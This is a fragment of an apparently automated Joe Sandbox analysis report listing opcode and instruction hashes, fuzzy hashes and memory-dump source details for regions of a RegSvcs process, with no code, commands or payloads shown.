                                                                                                                                                          • Opcode Fuzzy Hash: 4524a95b2df579d92dda25df4e34395e6be77cd3d6fc704e2ab2fbdda9c753a5
                                                                                                                                                          • Instruction Fuzzy Hash: BE713B347002158FCB15DF2AC494A6E7BFAEF49604F5A44AAE802CB3B1DB70EC55CB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c2ca73dba03c88016532e71bd84b3c7aa141355e4b024dca83971ba6a8549a1b
                                                                                                                                                          • Instruction ID: b9ba3b3e811157fae09171730b2b1bfcc0911171f83d488542a4f768cc597ef0
                                                                                                                                                          • Opcode Fuzzy Hash: c2ca73dba03c88016532e71bd84b3c7aa141355e4b024dca83971ba6a8549a1b
                                                                                                                                                          • Instruction Fuzzy Hash: 2871BB74D01209CFCB19EFB9E599A8E7BB1FF48309B206A25E4159B36DE7306945CF40
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4189850773758bdecaf972c31fdb12a5f640b020b46ec8d7eb4e2d3a3b7d4770
                                                                                                                                                          • Instruction ID: 5411992710c5421037dc258f77aa5fa992a5c68408b89536f8782e3ed729331c
                                                                                                                                                          • Opcode Fuzzy Hash: 4189850773758bdecaf972c31fdb12a5f640b020b46ec8d7eb4e2d3a3b7d4770
                                                                                                                                                          • Instruction Fuzzy Hash: EB51C874E01218CFCB08DFBAD59499DBBF2FF89314B209469E409AB368DB31A945CF10
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ca0ab65fa9d727227c3637e7a59a8213654d2ff2383817a75938a93460ad69b4
                                                                                                                                                          • Instruction ID: 817bd2cc0a2b829b626abb57e5090c6bd553b528aa1572c4b574728b4eeb99cc
                                                                                                                                                          • Opcode Fuzzy Hash: ca0ab65fa9d727227c3637e7a59a8213654d2ff2383817a75938a93460ad69b4
                                                                                                                                                          • Instruction Fuzzy Hash: D651C674E01218CFCB08DFBAD59489DBBF2FF89314B209469E409AB328DB31A945CF10
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e54e5ecb8dfc0f6db1866fe027413491e752f301b83847cbbdebfd44108a58a9
                                                                                                                                                          • Instruction ID: 6089e2da0a610c364e5cc5a31ade4f78bf47a6099b104a10bc1d9dd7e2a31898
                                                                                                                                                          • Opcode Fuzzy Hash: e54e5ecb8dfc0f6db1866fe027413491e752f301b83847cbbdebfd44108a58a9
                                                                                                                                                          • Instruction Fuzzy Hash: F141B031A04269DFCF15CFA6C844B9EBBB2FF49314F648156E8059B395D370E958CBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2379c1a5cd747666fd2c7ab6d16bb2c11ce0f3be1435928fc9c8be2872fcc1f3
                                                                                                                                                          • Instruction ID: 1ebdf48cef7f14fbf3b5e5a14dc8edb7cc162890322a8c5736c9ff35bfbf799f
                                                                                                                                                          • Opcode Fuzzy Hash: 2379c1a5cd747666fd2c7ab6d16bb2c11ce0f3be1435928fc9c8be2872fcc1f3
                                                                                                                                                          • Instruction Fuzzy Hash: 2441F1317012599FCF169FA5D854AAF3BB2EB88704F50846AF916CB344CB39CD26CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ad69da03cb4231f14be79e3e357ba212f239e6fa13efbc3748b7d806b845e569
                                                                                                                                                          • Instruction ID: fe8f1274b094a66cd5912f55ec55993f86372ade451a25905900d575873a0274
                                                                                                                                                          • Opcode Fuzzy Hash: ad69da03cb4231f14be79e3e357ba212f239e6fa13efbc3748b7d806b845e569
                                                                                                                                                          • Instruction Fuzzy Hash: D731E1791253829FC3112F70B1BC1AA7B33FBAF3137456C62E49A81645DBB90E49CB21
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3f2d8c92a762249846d8d1aef48c0a330b9db7fe04f12651d062ccb13052478e
                                                                                                                                                          • Instruction ID: d3b62852020bae010e32b303f73b23044d6a3c34b7bfd33f1da080c876a166f1
                                                                                                                                                          • Opcode Fuzzy Hash: 3f2d8c92a762249846d8d1aef48c0a330b9db7fe04f12651d062ccb13052478e
                                                                                                                                                          • Instruction Fuzzy Hash: EC319E71C51219CFCB06EFE8E8486EDBB75FF0A306F809916E445B7264EB30569ACB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e1f01b60f690cd7387dd367d6cd78a6e3a2523bab904fea14fd598cee77c9b1d
                                                                                                                                                          • Instruction ID: ef0e9547306062b78f9124d1787e963b3b25412c295b687085958c477001dcfb
                                                                                                                                                          • Opcode Fuzzy Hash: e1f01b60f690cd7387dd367d6cd78a6e3a2523bab904fea14fd598cee77c9b1d
                                                                                                                                                          • Instruction Fuzzy Hash: 6A21B0303002224BDB2556278594B3FA69BAFC4759F95843BE502CBB98DF76CC4EDB81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2614f0442c4d98db72a85c72491d87a5622ee5cadbc3b432afef5a48e3c94a75
                                                                                                                                                          • Instruction ID: 755ffd6427db76cfaea85c8ddde8da9acf900069ec2dd2ba36b2616db938b403
                                                                                                                                                          • Opcode Fuzzy Hash: 2614f0442c4d98db72a85c72491d87a5622ee5cadbc3b432afef5a48e3c94a75
                                                                                                                                                          • Instruction Fuzzy Hash: D321D3303002214BDB259B378594B3FB696AFC4659B95843BD402CB7A4EB36CC4EDB81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 008d93813e479d2d9033c5e041808516362dd4824e16787d147c42bae9639f03
                                                                                                                                                          • Instruction ID: 490cec7ab45249acd5c120e00a590062dc6ea164e2cf5093c9c0c17409557958
                                                                                                                                                          • Opcode Fuzzy Hash: 008d93813e479d2d9033c5e041808516362dd4824e16787d147c42bae9639f03
                                                                                                                                                          • Instruction Fuzzy Hash: 6D21F831A002569FCB55DB38C4509FF7B70EF89250B54815ADC4EEB359EB31EA0ACB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f3abf101a961ebe717203f510274226be759d16e0c7078218a2c0dfa98852f28
                                                                                                                                                          • Instruction ID: 8bcaf377905806b4322f4623c5f291fd0c14d5708522a14d5cd12d255c00910c
                                                                                                                                                          • Opcode Fuzzy Hash: f3abf101a961ebe717203f510274226be759d16e0c7078218a2c0dfa98852f28
                                                                                                                                                          • Instruction Fuzzy Hash: A821BE367056228FC72D9B66D46462FB7A2FF85755795846AE806CB398CFB0CC07CB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2862844515.00000000023DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 023DD000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_23dd000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 042793ecfbe56e81c190135ee1d3e044f21337394c25388f779bc6a26622c619
                                                                                                                                                          • Instruction ID: d5bde58fe1aebf7752faa1a2d59759d3e4c6c075fffa31d7a10cbcc695ff5402
                                                                                                                                                          • Opcode Fuzzy Hash: 042793ecfbe56e81c190135ee1d3e044f21337394c25388f779bc6a26622c619
                                                                                                                                                          • Instruction Fuzzy Hash: D02134B3504208DFDB10DF14E9C0B26BBA9FBC8314F24C56DE90A4B246C33AD407CA62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5f4293c4e3f2cdfb0863a3cb33747bfc1e827bcdf50b3ad9d62ed585cba76e78
                                                                                                                                                          • Instruction ID: 7374bd748d54d8fed56649400b77bc6f9716ded12db2ecaade6c1c98e3f50f46
                                                                                                                                                          • Opcode Fuzzy Hash: 5f4293c4e3f2cdfb0863a3cb33747bfc1e827bcdf50b3ad9d62ed585cba76e78
                                                                                                                                                          • Instruction Fuzzy Hash: 63213D75A442199FC709EFBAD4506AFBBB2EF89309F10C8AE8405AB394DB748945CF41
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2862844515.00000000023DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 023DD000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_23dd000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1ab956588a4402198748b3a99c0f47b8ea25576a276bd6a0607232b90a443a6e
                                                                                                                                                          • Instruction ID: 0cecd8d195f09f2003b8f937f0652fa151d1e51f651fe995776be59266069678
                                                                                                                                                          • Opcode Fuzzy Hash: 1ab956588a4402198748b3a99c0f47b8ea25576a276bd6a0607232b90a443a6e
                                                                                                                                                          • Instruction Fuzzy Hash: 48219C7650D3C48FCB07CF20D990710BF71AB46214F28C5DBC8888B6A7C33A980ACB62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7f3981216eb8674ba80fb183853de0a0cfe0e2cfacc5ccc637562ca3d4cfede3
                                                                                                                                                          • Instruction ID: 9c9b4f0d605d02d7998bf34ea6028200ffdf4846f07d66936e8779e5cf436adb
                                                                                                                                                          • Opcode Fuzzy Hash: 7f3981216eb8674ba80fb183853de0a0cfe0e2cfacc5ccc637562ca3d4cfede3
                                                                                                                                                          • Instruction Fuzzy Hash: A51101716563218FD3025F25E89CB3BBB79EF0B31AF841C92E00AC7261CB21D849CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 49208f1c15e5aa7fa11a69c5adf5335c77813a622613ba2c237275250419c778
                                                                                                                                                          • Instruction ID: 3d35c901d6606fd2c6dcb9bf8944f4d9fc9b7fb956b15b3f979444165d72b51e
                                                                                                                                                          • Opcode Fuzzy Hash: 49208f1c15e5aa7fa11a69c5adf5335c77813a622613ba2c237275250419c778
                                                                                                                                                          • Instruction Fuzzy Hash: B9218D74E01258DFCB04CFA6D550AEEBFB6AF88305F24845AE411E6394DB30E944DB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 892ad300ca738457d8645e77ec842b89c1b500bfc86a5523df24329da5e40d98
                                                                                                                                                          • Instruction ID: cfa7947e956a64380f1b6d1c834de9591d6f56660cbab31d9ffa930a6893b934
                                                                                                                                                          • Opcode Fuzzy Hash: 892ad300ca738457d8645e77ec842b89c1b500bfc86a5523df24329da5e40d98
                                                                                                                                                          • Instruction Fuzzy Hash: 66116A35B001149BDB148F65D888BEEBBB6EB88210F15456AE916E3390DB71AC15CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: be6aad63dfd099fc5091f119e9798670f42ada1f37869ca522f96fe0e2aa4a11
                                                                                                                                                          • Instruction ID: fad64fc8247706aaac2985f0295055001e20a2897f260c692e4ac9f63c0ef223
                                                                                                                                                          • Opcode Fuzzy Hash: be6aad63dfd099fc5091f119e9798670f42ada1f37869ca522f96fe0e2aa4a11
                                                                                                                                                          • Instruction Fuzzy Hash: 86118E317016229FC72D9B2AD45892FB7A6FF85B65399446AE806CB354CFB0DC028B90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6d05b5df3f60cb79e089e9bb623327055761bdea396f5d508269a40930444c85
                                                                                                                                                          • Instruction ID: 4c5a63200df6a151ce4cef560b370522867e733e7c2c2e6f4617419b9ad400c2
                                                                                                                                                          • Opcode Fuzzy Hash: 6d05b5df3f60cb79e089e9bb623327055761bdea396f5d508269a40930444c85
                                                                                                                                                          • Instruction Fuzzy Hash: 2D019272B003214FDB249F7A65547BF77ABEFC4568755843AD505CB324EEB1C8058B50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b567cde88d68c5b888feb748fb5e9ddd7b614587ff52be38ad5e140f4574de2d
                                                                                                                                                          • Instruction ID: ba5325a02c27898e9c232604130c7cbd68b70842d775b5f78767146b47ea0204
                                                                                                                                                          • Opcode Fuzzy Hash: b567cde88d68c5b888feb748fb5e9ddd7b614587ff52be38ad5e140f4574de2d
                                                                                                                                                          • Instruction Fuzzy Hash: 12016D32B013214BDB18ABBA995472F77EBEFC4668754843AD905CB324FEB0C9048691
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 93c76ec05f44b081ec23786383a9f24b73a428e3e3ab769719c475cce86438c7
                                                                                                                                                          • Instruction ID: 1792cd5d0ff1e4884c41de41a1e8b0e8b221c3ee3b7f504d17aa339e954d9637
                                                                                                                                                          • Opcode Fuzzy Hash: 93c76ec05f44b081ec23786383a9f24b73a428e3e3ab769719c475cce86438c7
                                                                                                                                                          • Instruction Fuzzy Hash: 26119DB4D0160A8FCB04EFA9D9456EEBBF4BF49300F10556AD809F2224EB305A95CFA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 17ea7cf44f30997c9234faf82810ceb34126bbae5b9a2847deef421f09031820
                                                                                                                                                          • Instruction ID: c2e2d1376bcf5a2ca571da041783a05c9a0ac00f37220798b123e966ab9b7c71
                                                                                                                                                          • Opcode Fuzzy Hash: 17ea7cf44f30997c9234faf82810ceb34126bbae5b9a2847deef421f09031820
                                                                                                                                                          • Instruction Fuzzy Hash: EB01D632B001256B9B159E9AA810AAF3BEBEBC8750F15802AF505C7384CE718C158B90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0e17d51eff0d53cb4545af0257ee876116e00e95a1b64227196437fb05737ad4
                                                                                                                                                          • Instruction ID: 61baf3cdf3a0cf454e179a000161f39495a4ee358eee551f8f7dd3e395fef127
                                                                                                                                                          • Opcode Fuzzy Hash: 0e17d51eff0d53cb4545af0257ee876116e00e95a1b64227196437fb05737ad4
                                                                                                                                                          • Instruction Fuzzy Hash: 0201D673A041556FDB128E659814AEF3FB6EF99350B19806AF504C7240DA318917CB51
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 12971d1a1a6f0cbb27a407a88c2f412691b16979b40b43bcd16da7875747662b
                                                                                                                                                          • Instruction ID: 183f28b92c9fb45b73d02d5d202a7b4589122cae76ad5e68720e3ebe5783c1ce
                                                                                                                                                          • Opcode Fuzzy Hash: 12971d1a1a6f0cbb27a407a88c2f412691b16979b40b43bcd16da7875747662b
                                                                                                                                                          • Instruction Fuzzy Hash: 3BE0C2B48A32128FE3172B20B4AC37A7B2AEB0B317F846D01F00BD1560CB304069CA10
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b1b941008297c75667a5f664bf00ff20945c67aeaaf8fc0a3bd305889dbab30c
                                                                                                                                                          • Instruction ID: dac5362b41fd4199d18091c487da6f62b669716bc3c2ea8c36df464ab901908d
                                                                                                                                                          • Opcode Fuzzy Hash: b1b941008297c75667a5f664bf00ff20945c67aeaaf8fc0a3bd305889dbab30c
                                                                                                                                                          • Instruction Fuzzy Hash: D9E02631D54666CBCB02EBA4AD505DEB734ED82120B584153C0647B160EB30221ECBB0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                          • Instruction ID: e68ea2a62fe1d767d9efd8e7d4ffa1c782aade8a077fac016a9bc4c5f89b5a61
                                                                                                                                                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                          • Instruction Fuzzy Hash: 3AC08C3320C1382AA224508F7C40FA3FB8CC3C52B4E620137F92DC7300A8429C8541F4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 40af88216833920b6c6171679fb78ef8e62e9833a0443b598ebfed6b2573912f
                                                                                                                                                          • Instruction ID: 4b6bb13fc237c0a36f12f5d45fd7c3c7642028085d37784298bf39efe65211ab
                                                                                                                                                          • Opcode Fuzzy Hash: 40af88216833920b6c6171679fb78ef8e62e9833a0443b598ebfed6b2573912f
                                                                                                                                                          • Instruction Fuzzy Hash: 2DD0677AB400189FCF049F98E8448DDF7B6FB98221B048516E915E3265C6319925DB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 171e8c857b14692ae6e54120d076f6c3b5509ea7cb3a25420e870c44223aa2f6
                                                                                                                                                          • Instruction ID: 22e8a16b7fef6b8f09f5566438c94214f7f62e9f79cdde0fcaf64782b32f595c
                                                                                                                                                          • Opcode Fuzzy Hash: 171e8c857b14692ae6e54120d076f6c3b5509ea7cb3a25420e870c44223aa2f6
                                                                                                                                                          • Instruction Fuzzy Hash: 58D02B7000D3444FC722FBB1FC1558A3B67EB80308F019864D0060F74DED3809428B52
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5f15adb2113a8009cfb3b89f91a9dae05d011b279798236c607bd6935bc285c3
                                                                                                                                                          • Instruction ID: 143e3b7cfddb54a70a7578d5b00908b1ebe89be47e01946aabef818fdc45772d
                                                                                                                                                          • Opcode Fuzzy Hash: 5f15adb2113a8009cfb3b89f91a9dae05d011b279798236c607bd6935bc285c3
                                                                                                                                                          • Instruction Fuzzy Hash: 74C012704043094FC616F7B7EC46956375EE7803087509910A0060A74DEE7418964B95
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d287157e38582bcc60deedf462600dd1ef76b0abf87cf29afd7087c71eeeb406
                                                                                                                                                          • Instruction ID: 499baa2a85b0b996ae0d566a12016cc680b138aa9bda225dec63ec21f046f753
                                                                                                                                                          • Opcode Fuzzy Hash: d287157e38582bcc60deedf462600dd1ef76b0abf87cf29afd7087c71eeeb406
                                                                                                                                                          • Instruction Fuzzy Hash: 9FC092F8A0D2816FCB029B2065A98A13FE0AD1630830708CFD081CF073C6648021CB02
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xkq$Xkq$Xkq$Xkq
